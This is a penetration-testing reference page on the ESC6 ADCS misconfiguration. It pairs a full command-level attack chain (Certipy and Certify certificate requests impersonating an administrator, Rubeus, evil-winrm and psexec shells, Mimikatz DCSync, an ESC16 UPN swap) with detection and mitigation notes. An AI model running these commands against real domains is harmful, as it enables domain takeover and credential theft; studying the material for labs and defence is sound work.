esc6-editf-attributesubjectaltname2-flag.md (13643B)
1 --- 2 title: "ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 Flag" 3 description: "certutil -config \"CA-SERVER\\DOMAIN-CA\" -getreg policy\\EditFlags" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs"] 7 tools: ["Impacket", "Mimikatz", "Rubeus", "Certipy", "BloodHound"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 Flag.md" 11 --- 12 # ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 Flag 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | CA-Level Misconfiguration | 19 | **Difficulty** | Low (pre-patch) / Blocked (post-patch) | 20 | **Pre-requisites** | `EDITF_ATTRIBUTESUBJECTALTNAME2` flag enabled on CA | 21 | **Tools** | Certipy, Certify.exe, certutil | 22 | **OPSEC Noise** | Low — standard cert request | 23 | **One-liner** | CA-level flag that allows user-specified SANs on ANY template, bypassing template-level restrictions. Largely patched by KB5014754. | 24 25 *** 26 27 ### Quick Check for EDITF Flag 28 29 ```bash 30 # From Windows 31 certutil -config "CA-SERVER\DOMAIN-CA" -getreg policy\EditFlags 32 # Look for EDITF_ATTRIBUTESUBJECTALTNAME2 in the output 33 34 # From Linux (via certipy) 35 certipy-ad find -u 'lowpriv@domain.htb' -p 'Password123!' \ 36 -dc-ip $TARGET -stdout | grep -i 'user specified san' 37 ``` 38 39 *** 40 41 ## What Is ESC6? 42 43 ESC6 is a **CA-level misconfiguration**, not a template-level one. This is a critical distinction from ESC1–4. With ESC1 you needed a template that had `ENROLLEE_SUPPLIES_SUBJECT` set. With ESC6, **that flag on the template doesn't matter at all** — because the CA itself has been told to accept a user-specified SAN on *any* certificate request, regardless of what the template says. 44 45 The flag responsible is `EDITF_ATTRIBUTESUBJECTALTNAME2`, stored in the CA's registry at `HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA-NAME>\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy`. When this flag is set, **every single template with Client Authentication EKU that low-priv users can enroll in becomes an ESC1 vector** — including the default built-in `User` template. 46 47 Think of it like this: ESC1 is a misconfigured door. ESC6 is the master key that opens every door in the building simultaneously. 48 49 *** 50 51 ## ⚠️ Critical Note — Patched After May 2022 52 53 Microsoft released a patch in **May 2022** (KB5014754) that broke the default exploit path for ESC6. After this patch, even if `EDITF_ATTRIBUTESUBJECTALTNAME2` is set, the CA **enforces strong certificate mapping** and will reject certificates where the SAN doesn't match the requester's actual identity for Kerberos authentication. 54 55 | Environment State | ESC6 Exploitable? | 56 |---|---| 57 | Unpatched / pre-May 2022 | ✅ Full ESC6 as described | 58 | Patched but `StrongCertificateBindingEnforcement = 0` | ✅ Still works | 59 | Patched but `StrongCertificateBindingEnforcement = 1` (default post-patch) | ⚠️ Partially blocked — Kerberos auth may fail | 60 | Patched and `StrongCertificateBindingEnforcement = 2` (enforced) | ❌ Blocked | 61 | ESC16 present (Security Extension disabled) | ✅ ESC6-like attack still works via UPN swap — as seen in your Fluffy box | 62 63 > 💡 This is exactly why your Fluffy box showed `ESC16` — the security extension was disabled, which in modern environments is the **post-patch equivalent of ESC6**. The two are closely related in concept and exploit path. 64 65 *** 66 67 ## Required Conditions 68 69 | Condition | Where to Check | 70 |-----------|----------------| 71 | `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set on CA | CA output: `User Specified SAN: Enabled` | 72 | `Request Disposition: Issue` (no manual approval) | CA output: `Request Disposition: Issue` | 73 | At least one template with Client Auth EKU enrollable by low-priv users | Any template with `Client Authentication: True` + `Enrollment Rights: Domain Users` | 74 75 *** 76 77 ## Step 0 — Enumeration 78 79 ```bash 80 # Standard scan 81 certipy-ad find -u 'lowpriv@domain.htb' -p 'Password123!' \ 82 -dc-ip $TARGET -vulnerable -stdout 83 84 # With hash 85 certipy-ad find -u 'lowpriv@domain.htb' -hashes :NTHASH \ 86 -dc-ip $TARGET -vulnerable -stdout 87 ``` 88 89 ### What Vulnerable ESC6 Output Looks Like 90 91 The vulnerability shows up at the **CA level**, not the template level: 92 93 ``` 94 Certificate Authorities 95 0 96 CA Name : DOMAIN-CA 97 DNS Name : DC01.domain.htb 98 Certificate Subject : CN=DOMAIN-CA, DC=domain, DC=htb 99 Web Enrollment : Enabled 100 User Specified SAN : Enabled ← THE key flag 101 Request Disposition : Issue ← No manual approval 102 Enforce Encryption for Requests : Disabled 103 Permissions 104 Access Rights 105 ManageCa : DOMAIN\Domain Admins 106 ManageCertificates: DOMAIN\Domain Admins 107 Enroll : DOMAIN\Authenticated Users 108 109 [!] Vulnerabilities 110 ESC6 : Enrollees can specify SAN and Request Disposition is set to Issue. 111 Does not work after May 2022 112 ``` 113 114 > 💡 Certipy explicitly warns `Does not work after May 2022` in the output. Don't ignore this — check the registry value before investing time in the attack. 115 116 *** 117 118 ## Checking the Registry (if you have access) 119 120 ```bash 121 # From Linux via Impacket 122 reg.py 'domain/administrator:Password123!'@$TARGET query \ 123 -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\DOMAIN-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy' 124 125 # Look for: 126 # EditFlags REG_DWORD 0x00014... 127 # Bit 0x00040000 = EDITF_ATTRIBUTESUBJECTALTNAME2 = flag is SET 128 ``` 129 130 ```powershell 131 # From Windows on the CA server 132 reg query "HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA-NAME>\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy" 133 134 # Also check patch status 135 reg query "HKLM\SYSTEM\CurrentControlSet\Services\Kdc" /v StrongCertificateBindingEnforcement 136 # 0x0 = not enforced (ESC6 works) 137 # 0x1 = partial enforcement (may work) 138 # 0x2 = fully enforced (blocked) 139 ``` 140 141 *** 142 143 ## Full Attack Chain — Linux (Certipy) 144 145 ESC6's exploit is **identical to ESC1** in commands — the difference is you don't need a specially misconfigured template. Any template with Client Auth works, including the built-in `User` template. 146 147 ### Step 1 — Request cert with injected SAN against ANY auth-capable template 148 149 ```bash 150 # Using the built-in User template — almost always available 151 certipy-ad req \ 152 -u 'lowpriv@domain.htb' \ 153 -p 'Password123!' \ 154 -dc-ip $TARGET \ 155 -ca 'DOMAIN-CA-NAME' \ 156 -template 'User' \ 157 -upn 'administrator@domain.htb' 158 159 # Output: administrator.pfx 160 161 # If User template doesn't work, try Machine, or any other 162 # Client Auth template visible in certipy output 163 certipy-ad req \ 164 -u 'lowpriv@domain.htb' \ 165 -p 'Password123!' \ 166 -dc-ip $TARGET \ 167 -ca 'DOMAIN-CA-NAME' \ 168 -template 'Machine' \ 169 -upn 'administrator@domain.htb' 170 ``` 171 172 **Expected output:** 173 ``` 174 [*] Requesting certificate via RPC 175 [*] Successfully requested certificate 176 [*] Request ID is 22 177 [*] Got certificate with UPN 'administrator@domain.htb' 178 [*] Certificate has no object SID 179 [*] Saving certificate and private key to 'administrator.pfx' 180 ``` 181 182 *** 183 184 ### Step 2 — Authenticate 185 186 ```bash 187 certipy-ad auth \ 188 -pfx administrator.pfx \ 189 -username administrator \ 190 -domain domain.htb \ 191 -dc-ip $TARGET 192 193 # Output: administrator.ccache + NT hash 194 ``` 195 196 *** 197 198 ### Step 3 — Shell 199 200 ```bash 201 # Kerberos TGT 202 export KRB5CCNAME=administrator.ccache 203 wmiexec.py -k -no-pass DC01.domain.htb 204 evil-winrm -i DC01.domain.htb -r domain.htb 205 206 # Pass-the-Hash 207 evil-winrm -i $TARGET -u administrator -H <NTHASH> 208 psexec.py administrator@$TARGET -hashes :NTHASH 209 ``` 210 211 *** 212 213 ## Full Attack Chain — Windows (Certify.exe + Rubeus) 214 215 ```powershell 216 # Step 1: Request cert using any Client Auth template 217 .\Certify.exe request /ca:DC01.domain.local\DOMAIN-CA /template:User /altname:administrator 218 # Copy cert.pem, convert: 219 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx 220 # Leave password blank 221 222 # Step 2: Get TGT + NT hash 223 .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap 224 225 # Step 3: Inject and use 226 .\Rubeus.exe createnetonly /program:powershell.exe /show 227 .\Rubeus.exe ptt /ticket:<base64ticket> 228 Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"' 229 ``` 230 231 *** 232 233 ## How to SET the Flag (Red Team / Lab Setup) 234 235 If you have CA admin rights and want to demonstrate the vulnerability in a lab: 236 237 ```powershell 238 # On the CA server — SET the flag 239 certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2 240 net stop certsvc && net start certsvc 241 242 # To UNSET (remediation) 243 certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2 244 net stop certsvc && net start certsvc 245 ``` 246 247 *** 248 249 ## ESC6 vs ESC1 — Key Differences 250 251 | | ESC1 | ESC6 | 252 |---|---|---| 253 | **Where misconfiguration lives** | Certificate Template | **Certificate Authority** | 254 | **Flag responsible** | `ENROLLEE_SUPPLIES_SUBJECT` on template | `EDITF_ATTRIBUTESUBJECTALTNAME2` on CA | 255 | **Templates affected** | Only the specific misconfigured template | **Every** Client Auth template on that CA | 256 | **Requires specific template** | ✅ Must find the ESC1 template | ❌ Any Client Auth template works | 257 | **Post-May 2022 patch** | Still works (template-level) | ⚠️ May be blocked | 258 | **Certipy `-upn` flag** | ✅ Same | ✅ Same | 259 | **Modern equivalent** | — | **ESC16** (Security Extension disabled) | 260 261 *** 262 263 ## ESC6 → ESC16 Connection (Relevant to Your Fluffy Box) 264 265 Your Fluffy box had `ESC16: Security Extension is disabled`. This is the **post-patch spiritual successor to ESC6**. The exploit path is almost identical — but instead of relying on the CA accepting a user-specified SAN at enrollment time, you: 266 267 1. Find an account you have `GenericWrite` over (e.g., `ca_svc`) 268 2. **Modify that account's UPN** to match the target (e.g., `administrator`) 269 3. Request a cert from **any Client Auth template** using that account 270 4. **Restore the UPN** immediately after 271 5. Authenticate — the cert was issued with `UPN: administrator` embedded 272 273 ```bash 274 # What you did on Fluffy — ESC16 chain 275 certipy-ad account -u winrm_svc@fluffy.htb -hashes ... \ 276 -user ca_svc -upn administrator update # 1. Swap UPN 277 278 certipy-ad req -u ca_svc -hashes ... \ 279 -ca fluffy-DC01-CA -template User # 2. Request cert 280 281 certipy-ad account -u winrm_svc@fluffy.htb -hashes ... \ 282 -user ca_svc -upn ca_svc@fluffy.htb update # 3. Restore UPN 283 284 certipy-ad auth -pfx administrator.pfx \ 285 -u administrator -domain fluffy.htb -dc-ip $TARGET # 4. Auth 286 ``` 287 288 This is covered fully in the ESC16 section later in the series. 289 290 *** 291 292 ## Detection Indicators 293 294 - **Certipy / Certify output:** `User Specified SAN: Enabled` in CA section 295 - **Registry:** `EDITF_ATTRIBUTESUBJECTALTNAME2` bit set in `EditFlags` value 296 - **Event ID 4887** — Certificate issued where Subject differs from requester 297 - **Microsoft Defender for Identity** — Has a built-in detection for `ESC6` flagged as "Edit vulnerable Certificate Authority setting" 298 299 *** 300 301 ## Mitigation 302 303 - **Unset the flag** immediately on any CA where it is enabled: 304 ```powershell 305 certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2 306 net stop certsvc && net start certsvc 307 ``` 308 - **Enforce strong certificate binding** — set `StrongCertificateBindingEnforcement = 2` in the KDC registry key after ensuring all certificates have been re-issued with objectSID extensions 309 - **Apply KB5014754** if not already patched — this forces the DC to require the objectSID extension in certificates for Kerberos auth 310 - **Audit CA configuration regularly** — include CA-level flags in your ADCS security reviews, not just template-level settings 311 312 *** 313 314 ## OPSEC Considerations 315 316 | Action | Log Generated | Noise Level | 317 |--------|--------------|-------------| 318 | Certipy enumeration | LDAP queries | 🟢 Low | 319 | certutil flag check | Event ID 4688 (process creation) | 🟢 Low | 320 | Certificate request | Event ID 4886/4887 | 🟢 Low | 321 322 > 💡 ESC6 is low noise because it uses standard enrollment. However, post-patch, it produces warning events when the KDC detects a SAN that doesn't match the requester. 323 324 Sources 325 Active Directory Certificate Attack (ADCS – ESC6) - RBT Security https://www.rbtsec.com/blog/active-directory-certificate-attack-adcs-esc6/ 326 ESC6 - Pentest Everything - GitBook https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adcs/esc6 327 Common ADCS Vulnerabilities: Logging, Exploitation ... - Lares Labs https://labs.lares.com/adcs-exploits-investigations-pt2/ 328 Certificates - Microsoft Defender for Identity https://learn.microsoft.com/en-us/defender-for-identity/security-posture-assessments/certificates 329 ADCS Attack Paths in BloodHound — Part 3 - Blog - SpecterOps https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb00856ac 330 06 ‐ Privilege Escalation · ly4k/Certipy Wiki - GitHub https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation 331 AD CS Security: Understanding and Exploiting ESC Techniques https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/ 332 Attacking AD CS ESC Vulnerabilities Using Metasploit https://rapid7.github.io/metasploit-framework/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html 333 AD CS Misconfigurations - Structured https://structured.com/blog/ad-cs-misconfigurations/ 334 Certificate templates | The Hacker Recipes https://www.thehacker.recipes/ad/movement/adcs/certificate-templates